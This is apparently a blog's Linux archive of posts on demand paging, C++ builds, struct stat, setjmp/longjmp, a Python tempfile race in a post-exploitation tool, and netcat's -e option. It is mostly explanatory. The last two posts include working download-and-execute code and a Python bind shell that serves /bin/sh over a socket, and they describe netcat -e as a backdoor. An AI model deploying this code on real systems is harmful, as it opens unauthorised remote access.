Category Archives: Linux

What they don’t tell you about demand paging in school

This post details my adventures with the Linux virtual memory subsystem, and my discovery of a creative way to taunt the OOM (out of memory) killer by accumulating memory in the kernel, rather than in userspace.

Keep reading and you’ll learn:

  • Internal details of the Linux kernel’s demand paging implementation
  • How to exploit virtual memory to implement highly efficient sparse data structures
  • What page tables are and how to calculate the memory overhead incurred by them
  • A cute way to get killed by the OOM killer while appearing to consume very little memory (great for parties)

Note: Victor Michel wrote a great follow-up to this post here.

Continue reading

Being pedantic about C++ compilation

Takeaways:

  • Don’t assume it’s safe to use pre-built dependencies when compiling C++ programs. You might want to build from source, especially if you can’t determine how a pre-built object was compiled, or if you want to use a different C++ standard than was used to compile it.
  • Ubuntu has public build logs which can help you determine if you can use a pre-built object, or if you should compile from source.
  • pkg-config is useful for generating the flags needed to compile a complex third-party dependency. CMake’s PkgConfig module can make it easy to integrate a dep into your build system.
  • Prefer CMake IMPORTED targets (e.g. BZip2::BZip2) over legacy variables (e.g. BZIP2_INCLUDE_DIRS and BZIP2_LIBRARIES).

Continue reading

struct stat notes

struct stat on Linux is pretty interesting:

  • the struct definition in the man page is not exactly accurate
  • glibc explicitly pads the struct with unused members, which is interesting. I guess it's to reserve space for future expansion of the fields
    • if you want to see the real definition, a trick you can use is to write a test program that uses a struct stat, compile it with -E to stop after preprocessing, then look in that output for the definition
  • you can look in the glibc sources and the linux sources and see that they actually have to make their struct definitions match! (i think). since kernel space is populating the struct memory and userspace is reading it, they need to agree exactly on where the members are
    • you can find some snarky comments in linux about the padding, which is pretty funny. for example (arch/arm/include/uapi/asm/stat.h)
  • because the structs are explicitly padded, if you initialize a struct stat with an initializer list, you CANNOT omit the designators. if you use positional initializers, the values can end up in the padding members instead of the fields you wanted!

How setjmp and longjmp work

Pretty recently I learned about setjmp() and longjmp(). They’re a neat pair of libc functions that allow you to save your program’s current execution context and resume it at an arbitrary point in the future (with some caveats). If you’re wondering why this is particularly useful, to quote the manpage, one of their main use cases is “…for dealing with errors and interrupts encountered in a low-level subroutine of a program.” These functions can be used for more sophisticated error handling than simple error code return values.

I was curious how these functions worked, so I decided to take a look at musl libc’s implementation for x86. First, I’ll explain their interfaces and show an example usage program. Next, since this post isn’t aimed at the assembly wizard, I’ll cover some basics of x86 and Linux calling convention to provide some required background knowledge. Lastly, I’ll walk through the source, line by line.

Continue reading

Off to the (Python Internals) Races

This post is about an interesting race condition bug I ran into a while ago while working on a small feature improvement for poet, which I thought was worth writing up.

In particular, I was improving the download-and-execute capability of poet, which, if you couldn’t tell, downloads a file from the internet and executes it on the target. When I originally wrote it, I didn’t know about the python tempfile module, and since I had recently learned about it, I wanted to integrate it into poet as a significant improvement over the original implementation. The initial patch looked like this:

r = urllib2.urlopen(inp.split()[1])
with tempfile.NamedTemporaryFile() as f:
    f.write(r.read())
    os.fchmod(f.fileno(), stat.S_IRWXU)
    f.flush()  # ensure that file was actually written to disk
    sp.Popen(f.name, stdout=open(os.devnull, 'w'), stderr=sp.STDOUT)

This code downloads a file from the internet, writes it to a tempfile on disk, sets its permissions to executable, and executes it in a subprocess. In testing this code, I observed some puzzling behavior: the file was never actually getting executed because it was suddenly ceasing to exist! I noticed, though, that when I used subprocess.call() or called .wait() on the Popen(), it would work fine. However, I intentionally didn’t want the client to block while the file executed its arbitrary payload, so I couldn’t use those functions.
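
For reference, a blocking variant along these lines (a rough sketch of that approach, not the exact code I tested) did execute the payload reliably:

with tempfile.NamedTemporaryFile() as f:
    f.write(r.read())
    os.fchmod(f.fileno(), stat.S_IRWXU)
    f.flush()
    # .wait() keeps us inside the with block until the child has finished,
    # so the temp file still exists on disk when the child exec's it
    sp.Popen(f.name, stdout=open(os.devnull, 'w'), stderr=sp.STDOUT).wait()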

The fact that execution worked when the Popen call waited for the process, and not otherwise, suggested a race between the child getting around to exec’ing the file and the with block ending and deleting the file (tempfile’s default behavior). More specifically, the file must have been deleted at some point before the exec syscall loaded it from disk into memory. Let’s take a look at the implementation of subprocess.Popen() to see if we can gain some more insight:

def _execute_child(self, args, executable, preexec_fn, close_fds,
                           cwd, env, universal_newlines,
                           startupinfo, creationflags, shell, to_close,
                           p2cread, p2cwrite,
                           c2pread, c2pwrite,
                           errread, errwrite):
            """Execute program (POSIX version)"""

            <snip>

            try:
                try:
                    <snip>
                    try:
                        self.pid = os.fork()
                    except:
                        if gc_was_enabled:
                            gc.enable()
                        raise
                    self._child_created = True
                    if self.pid == 0:
                        # Child
                        try:
                            # Close parent's pipe ends
                            if p2cwrite is not None:
                                os.close(p2cwrite)
                            if c2pread is not None:
                                os.close(c2pread)
                            if errread is not None:
                                os.close(errread)
                            os.close(errpipe_read)

                            # When duping fds, if there arises a situation
                            # where one of the fds is either 0, 1 or 2, it
                            # is possible that it is overwritten (#12607).
                            if c2pwrite == 0:
                                c2pwrite = os.dup(c2pwrite)
                            if errwrite == 0 or errwrite == 1:
                                errwrite = os.dup(errwrite)

                            # Dup fds for child
                            def _dup2(a, b):
                                # dup2() removes the CLOEXEC flag but
                                # we must do it ourselves if dup2()
                                # would be a no-op (issue #10806).
                                if a == b:
                                    self._set_cloexec_flag(a, False)
                                elif a is not None:
                                    os.dup2(a, b)
                            _dup2(p2cread, 0)
                            _dup2(c2pwrite, 1)
                            _dup2(errwrite, 2)

                            # Close pipe fds.  Make sure we don't close the
                            # same fd more than once, or standard fds.
                            closed = { None }
                            for fd in [p2cread, c2pwrite, errwrite]:
                                if fd not in closed and fd > 2:
                                    os.close(fd)
                                    closed.add(fd)

                            if cwd is not None:
                                os.chdir(cwd)

                            if preexec_fn:
                                preexec_fn()

                            # Close all other fds, if asked for - after
                            # preexec_fn(), which may open FDs.
                            if close_fds:
                                self._close_fds(but=errpipe_write)

                            if env is None:
                                os.execvp(executable, args)
                            else:
                                os.execvpe(executable, args, env)

                        except:
                            exc_type, exc_value, tb = sys.exc_info()
                            # Save the traceback and attach it to the exception object
                            exc_lines = traceback.format_exception(exc_type,
                                                                   exc_value,
                                                                   tb)
                            exc_value.child_traceback = ''.join(exc_lines)
                            os.write(errpipe_write, pickle.dumps(exc_value))

                        # This exitcode won't be reported to applications, so it
                        # really doesn't matter what we return.
                        os._exit(255)

                    # Parent
                    if gc_was_enabled:
                        gc.enable()
                finally:
                    # be sure the FD is closed no matter what
                    os.close(errpipe_write)

                # Wait for exec to fail or succeed; possibly raising exception
                # Exception limited to 1M
                data = _eintr_retry_call(os.read, errpipe_read, 1048576)

                <snip>

The _execute_child() function is called by the subprocess.Popen class constructor and implements child process execution. There’s a lot of code here, but the key parts to notice are the os.fork() call, which creates the child process, and the relative lengths of the branches that follow it. The if self.pid == 0 branch contains the code for executing the child process and is significantly more involved than the code for handling the parent process.

From this, we can deduce what happens when the subprocess.Popen() call executes in my code: after forking, while the child is still preparing to call exec, the parent simply returns from Popen() and my code immediately exits the with block. This automatically invokes f.close(), which deletes the temp file. By the time the child reaches its execvp() call, the file is already gone from disk. Oops.

I fixed this by adding the delete=False argument to the NamedTemporaryFile constructor to suppress the auto-delete behavior. Of course this means the downloaded files have to be cleaned up manually, but it lets the client avoid blocking while the file executes and keeps the code pretty clean.
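
The fixed version looks roughly like this (a sketch based on the description above, not the exact commit):

r = urllib2.urlopen(inp.split()[1])
with tempfile.NamedTemporaryFile(delete=False) as f:  # don't unlink the file on close
    f.write(r.read())
    os.fchmod(f.fileno(), stat.S_IRWXU)
    f.flush()  # ensure that file was actually written to disk
    sp.Popen(f.name, stdout=open(os.devnull, 'w'), stderr=sp.STDOUT)
# f.name now survives the end of the with block and must be removed separately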

Main takeaway here: don’t try to Popen a NamedTemporaryFile as the last statement in the tempfile’s with block.

Netcat “-e” Analysis

As I mentioned in a previous post, netcat has this cool -e parameter that lets you specify an executable to essentially turn into a network service, that is, a process that can send and receive data over the network. This option is particularly useful when called with a shell (/bin/sh, /bin/bash, etc.) as the parameter, because this creates a poor man’s remote shell connection and can also be used as a backdoor into the system. As part of the post-exploitation tool I’m working on, I wanted to add this type of remote shell feature, but it wasn’t immediately obvious to me how something like this would be done, so I decided to dive into netcat’s source and see if I could understand how it was implemented.

Not knowing where to start, I first tried searching the source for "-e", which brought me to:

case 'e':           /* prog to exec */
  if (opt_exec)
    ncprint(NCPRINT_ERROR | NCPRINT_EXIT,
            _("Cannot specify `-e' option double"));
  opt_exec = strdup(optarg);
  break;

This snippet is part of the GNU getopt argument parsing loop. When "-e" is seen, it first checks whether opt_exec has already been set (i.e. "-e" was passed more than once) and exits with an error if so; otherwise it sets the global char* variable opt_exec to the option’s argument. Then I tried searching for opt_exec, bringing me to:

if (netcat_mode == NETCAT_LISTEN) {
  if (opt_exec) {
    ncprint(NCPRINT_VERB2, _("Passing control to the specified program"));
    ncexec(&listen_sock);       /* this won't return */
  }
  core_readwrite(&listen_sock, &stdio_sock);
  debug_dv(("Listen: EXIT"));
}

This code checks if opt_exec is set and, if so, calls ncexec().

/* Execute an external file making its stdin/stdout/stderr the actual socket */

static void ncexec(nc_sock_t *ncsock)
{
  int saved_stderr;
  char *p;
  assert(ncsock && (ncsock->fd >= 0));

  /* save the stderr fd because we may need it later */
  saved_stderr = dup(STDERR_FILENO);

  /* duplicate the socket for the child program */
  dup2(ncsock->fd, STDIN_FILENO);   /* the precise order of fiddlage */
  close(ncsock->fd);            /* is apparently crucial; this is */
  dup2(STDIN_FILENO, STDOUT_FILENO);    /* swiped directly out of "inetd". */
  dup2(STDIN_FILENO, STDERR_FILENO);    /* also duplicate the stderr channel */

  /* change the label for the executed program */
  if ((p = strrchr(opt_exec, '/')))
    p++;            /* shorter argv[0] */
  else
    p = opt_exec;

  /* replace this process with the new one */
#ifndef USE_OLD_COMPAT
  execl("/bin/sh", p, "-c", opt_exec, NULL);
#else
  execl(opt_exec, p, NULL);
#endif
  dup2(saved_stderr, STDERR_FILENO);
  ncprint(NCPRINT_ERROR | NCPRINT_EXIT, _("Couldn't execute %s: %s"),
      opt_exec, strerror(errno));
}               /* end of ncexec() */ 

Here, on lines 13-16, is how the "-e" parameter really works. dup2() takes two file descriptors; it closes the second one (as if close() had been called on it) and then makes it a duplicate of the first. So in this case, on line 13, stdin is being pointed at the file descriptor for the network socket netcat opened. This means the program we’re about to exec will see any data received over the network as its input and will act accordingly. Then on lines 15 and 16, stdout and stderr are also pointed at the socket, which causes any output the program produces to be sent back over the network. As far as line 14 goes, I’m not sure why the original socket file descriptor has to be closed at that exact point (and based on the comments, it seems like the netcat author wasn’t sure either).

The main point is that this file descriptor swapping has essentially converted our specified program into a network service; all of its input and output will be piped over the network, and at this point the program can be executed. The execl() call replaces the netcat process image with the new program, which inherits the newly set socket file descriptors. Note that on lines 30 and 31 there’s some error handling code that restores netcat’s original stderr and prints an error message. That code should never actually be reached, because execl() doesn’t return on success; if it is reached, there was an error executing the program.

I wrote this little python program to see if I understood things correctly:

#!/usr/bin/env python

import sys

inp = sys.stdin.read(5)
if inp == 'hello':
    sys.stdout.write('hi\n')
else:
    sys.stdout.write('bye\n')

It simply reads 5 bytes from stdin and prints ‘hi’ if those 5 bytes were ‘hello’, otherwise ‘bye’.

Using this program as the -e parameter results in this:

$ netcat -e /tmp/test.py -lp 8080 &
[1] 19021
$ echo asdfg | netcat 127.0.0.1 8080
bye
[1]+  Done                    netcat -e /tmp/test.py -lp 8080
$ netcat -e /tmp/test.py -lp 8080 &
[1] 19024
$ echo hello | netcat 127.0.0.1 8080
hi
[1]+  Done                    netcat -e /tmp/test.py -lp 8080

We can see the "server" launched in the background. The echo command sends data into the client netcat’s stdin, which gets sent over the network and handled by the python script; the script’s response comes back over the socket and gets printed. Then we see that the server exits, since the listening netcat process was replaced by the script and the script has finished.
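
Since the whole reason I dug into this was to add a similar feature to poet, here’s a rough Python sketch of the same fd-swapping idea. This is my own toy example (not netcat’s or poet’s actual code): it listens on a port, accepts one connection, points stdin/stdout/stderr at the socket with os.dup2(), and then exec’s a shell in place of itself.

#!/usr/bin/env python
import os
import socket

# toy "-e /bin/sh" equivalent: serve a shell to whoever connects
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.bind(('0.0.0.0', 8080))
srv.listen(1)
conn, _ = srv.accept()

# same trick as ncexec(): make the socket our stdin/stdout/stderr...
os.dup2(conn.fileno(), 0)
os.dup2(conn.fileno(), 1)
os.dup2(conn.fileno(), 2)

# ...then replace this process with the shell, which inherits those fds
os.execl('/bin/sh', 'sh')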